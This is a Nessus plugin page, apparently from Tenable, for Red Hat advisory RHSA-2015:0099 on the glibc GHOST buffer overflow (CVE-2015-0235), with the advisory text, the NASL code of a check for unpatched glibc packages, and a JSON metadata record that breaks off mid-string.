ID REDHAT-RHSA-2015-0099.NASL Type nessus Reporter Tenable Modified 2018-12-27T00:00:00
Description
Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.
Red Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.
A heap-based buffer overflow was found in glibc's
__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)
Red Hat would like to thank Qualys for reporting this issue.
All glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2015:0099. The text
# itself is copyright (C) Red Hat, Inc.
#
include("compat.inc");
if (description)
{
script_id(81068);
script_version("1.19");
script_cvs_date("Date: 2018/12/27 10:05:36");
script_cve_id("CVE-2015-0235");
script_xref(name:"RHSA", value:"2015:0099");
script_name(english:"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)");
script_summary(english:"Checks the rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Red Hat host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"Updated glibc packages that fix one security issue are now available
for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux
5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced
Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended
Update Support.
Red Hat Product Security has rated this update as having Critical
security impact. A Common Vulnerability Scoring System (CVSS) base
score, which gives a detailed severity rating, is available from the
CVE link in the References section.
The glibc packages provide the standard C libraries (libc), POSIX
thread libraries (libpthread), standard math libraries (libm), and the
Name Server Caching Daemon (nscd) used by multiple programs on the
system. Without these libraries, the Linux system cannot function
correctly.
A heap-based buffer overflow was found in glibc's
__nss_hostname_digits_dots() function, which is used by the
gethostbyname() and gethostbyname2() glibc function calls. A remote
attacker able to make an application call either of these functions
could use this flaw to execute arbitrary code with the permissions of
the user running the application. (CVE-2015-0235)
Red Hat would like to thank Qualys for reporting this issue.
All glibc users are advised to upgrade to these updated packages,
which contain a backported patch to correct this issue."
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/errata/RHSA-2015:0099"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2015-0235"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-common");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-headers");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-static");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-utils");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:nscd");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.6");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.9");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.2");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.4");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.5");
script_set_attribute(attribute:"patch_publication_date", value:"2015/01/28");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/29");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Red Hat Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = eregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! ereg(pattern:"^(5\.6|5\.9|6)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 5.6 / 5.9 / 6.x", "Red Hat " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
rhsa = "RHSA-2015:0099";
yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
if (!empty_or_null(yum_report))
{
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : yum_report
);
exit(0);
}
else
{
audit_message = "affected by Red Hat security advisory " + rhsa;
audit(AUDIT_OS_NOT, audit_message);
}
}
else
{ sp = get_kb_item("Host/RedHat/minor_release");
if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
flag = 0;
if (rpm_check(release:"RHEL5", sp:"9", reference:"glibc-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i686", reference:"glibc-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-common-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"glibc-common-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"s390x", reference:"glibc-common-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-common-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"x86_64", reference:"glibc-common-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", reference:"glibc-debuginfo-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-debuginfo-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i686", reference:"glibc-debuginfo-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-debuginfo-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-debuginfo-common-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"glibc-debuginfo-common-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", reference:"glibc-devel-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-devel-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-devel-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-headers-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"glibc-headers-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"s390x", reference:"glibc-headers-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-headers-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"x86_64", reference:"glibc-headers-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-utils-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"glibc-utils-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"s390x", reference:"glibc-utils-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-utils-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"x86_64", reference:"glibc-utils-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"nscd-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"nscd-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"s390x", reference:"nscd-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"nscd-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"x86_64", reference:"nscd-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"i686", reference:"glibc-common-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"i686", reference:"glibc-common-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"s390x", reference:"glibc-common-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"s390x", reference:"glibc-common-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"x86_64", reference:"glibc-common-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-common-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"x86_64", reference:"glibc-common-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-debuginfo-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-debuginfo-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-debuginfo-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-debuginfo-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-debuginfo-common-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-debuginfo-common-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-debuginfo-common-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-debuginfo-common-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-devel-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-devel-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-devel-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-devel-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"i686", reference:"glibc-headers-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"i686", reference:"glibc-headers-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"s390x", reference:"glibc-headers-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"s390x", reference:"glibc-headers-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"x86_64", reference:"glibc-headers-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-headers-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"x86_64", reference:"glibc-headers-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-static-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-static-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-static-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-static-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"i686", reference:"glibc-utils-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"i686", reference:"glibc-utils-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"s390x", reference:"glibc-utils-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"s390x", reference:"glibc-utils-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"x86_64", reference:"glibc-utils-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-utils-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"x86_64", reference:"glibc-utils-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"i686", reference:"nscd-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"i686", reference:"nscd-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"s390x", reference:"nscd-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"s390x", reference:"nscd-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"x86_64", reference:"nscd-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"nscd-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"x86_64", reference:"nscd-2.12-1.132.el6_5.5")) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : rpm_report_get() + redhat_report_package_caveat()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc");
}
}
{"id": "REDHAT-RHSA-2015-0099.NASL", "bulletinFamily": "scanner", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "published": "2015-01-29T00:00:00", "modified": "2018-12-27T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "reporter": "Tenable", "references": ["https://access.redhat.com/errata/RHSA-2015:0099", "https://access.redhat.com/security/cve/cve-2015-0235"], "cvelist": ["CVE-2015-0235"], "type": "nessus", "lastseen": "2019-02-21T01:23:24", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5cc376a5555189aef3aef2d01a6def3f6ba8fb7ca76affca8ea06833e3fab5c4", "hashmap": [{"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "3c56ce37c7228a5617a8007318ab4b21", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "fef0e25dffa9e6451f742c4bce169e44", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2017-10-29T13:40:47", "modified": "2017-01-06T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2017/01/06 15:51:00 $\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_osvdb_id(117579);\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if 